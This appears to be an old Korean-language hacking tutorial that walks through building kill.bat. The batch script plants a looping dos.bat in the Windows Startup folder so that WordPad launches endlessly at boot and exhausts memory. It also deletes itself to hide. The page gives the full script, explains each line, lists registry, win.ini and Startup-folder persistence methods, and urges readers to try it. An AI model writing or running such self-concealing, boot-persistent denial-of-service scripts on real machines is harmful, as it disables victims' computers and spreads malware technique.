배치 파일 공격

배치 파일을 이용해 윈도우 죽이기

 

해킹 툴에는 여러 가지가 있습니다. 먼저 서비스 거부 공격 기능을 가진도스 배치 파일을
만들어보도록 하겠습니다. 배치 파일 공격
프로그램은실제 어려운 것이 없습니다.
번쩍이는 아이디어가 해킹 프로그램의 전부라고도 할 수 있죠. 문론 기본적인 지식을 가춘
다음에야
사색을 통한 아이디어가 나올 수 있겠지만요. 그렇다고 많은 지식을 요구하지는
않습니다.아이디어만 있으면 누구라도 해킹 프로그램을 제작할 수
있습니다.
그럼도스의 배치 파일을 이용해서 어떻게 윈도우를 망가뜨리는지 살펴보기로하죠.
도스에서 확장자가 .bat인 파일을 배치
파일이라고 합니다. 이 배치파일에는 각종 도스
명령어와 환경 설정을 해둠으로써 컴퓨터의 환경을편리하게 구축하는 데 그 목적이
있습니다.
배치 명령어로 할 수 있는 일은아주 많습니다. 그럼 지금부터 윈도우를 죽이는 배치 파일의
소스를 알아보도록하죠.

 

<다음과 같은 파일을 kill.bat라는 파일로 만듭니다.>

 

@echo off



echo @echo off > c:\windows\시작메~1\프로그램\시작프~1\dos.bat



echo :loop >> c:\windows\시작메~1\프로그램\시작프~1\dos.bat



echo c:\windows\write.exe >>
c:\windows\시작메~1\프로그램\시작프~1\dos.bat



echo goto loop >> c:\windows\시작메~1\프로그램\시작프~1\dos.bat



del %0

 

 

앞의 파일을 실행시키면 어떻게 될까요?

 

c:\kill.bat


하고 Enter를 누르면 실행됩니다. 실행은 했지만 아무런 메시지를 볼 수 없습니다.
그리고 kill.bat를 실행한 후 dir
명령으로 디렉토리에서 kill.bat을 찾아도 없습니다.
kill.bat는 실행하면서 자신은 스스로 삭제됩니다. 그럼 kill.bat의
내용을 하나하나
알아보도록 하죠. '@echo off'는 배치 파일의 실행시 아무런 메시지도 나타나지
않게 하겠다는
것입니다.
다음의 'echo @echo off >
c:\windows\시작메~1\프로그램\시작프~1\dos.bat'
는 windows 폴더의 [시작 - 프로그램 - 시작프로그램]
폴더에 dos.bat라는 파일을
생성하면서 '@echo off'라는 문장을 삽입한다는 의미입니다.
같은 원리로
'echo :loop >> c:\windows\시작메~1\프로그램\시작프~1\dos.bat'
명령이 수행된 후의
dos.bat의 내용은 다음과 같습니다.

 

@echo off

:loop

 

 

다음의 'echo c:\windows\write.exe >>
c:\windows\시작메~1\프로그램\시작프~1\dos.bat'
와 'echo goto loop >>
c:\windows\시작메~1\프로그램\시작프~1\dos.bat'는 역시 dos.bat의
파일에
'c:\windows\write.exe'와 'goto loop'라는 문장을 추가하라는 명령입니다.
마지막으로
'del %0' 명령으로 배치 파일 자신을 스스로 삭제합니다. del 명령어는 파일을 삭제하는
명령입니다.

 

 

윈도우에서 부팅시 프로그램을 실행하는 데는 세 가지 방법이 있습니다. 여기서의 배치 공격
은
시작프로그램의 폴더를 이용했습니다.



1. 윈도우의 레지스트리에 등록하는 방법
2. c:\windows\win.ini에 등록하는
방법
3. 시작프로그램 폴더에 등록하는 방법



앞의 dos.bat라는 파일이 시작프로그램 폴더에 있습니다. 그럼 윈도우는 부팅하면서
dos.bat라는 파일을 실행시킵니다. 그럼
dos.bat가 작업하는 워드패드를 무한대로
실행하기 때문에 윈도우는 부팅하자마자 시스템의 메모리를 고갈시켜 더 이상 작업을
진행할
수 없게 합니다. 간단한 서비스 공격의 일종입니다. kill.bat이라는 파일을 만들어
테스트해 보기 바랍니다.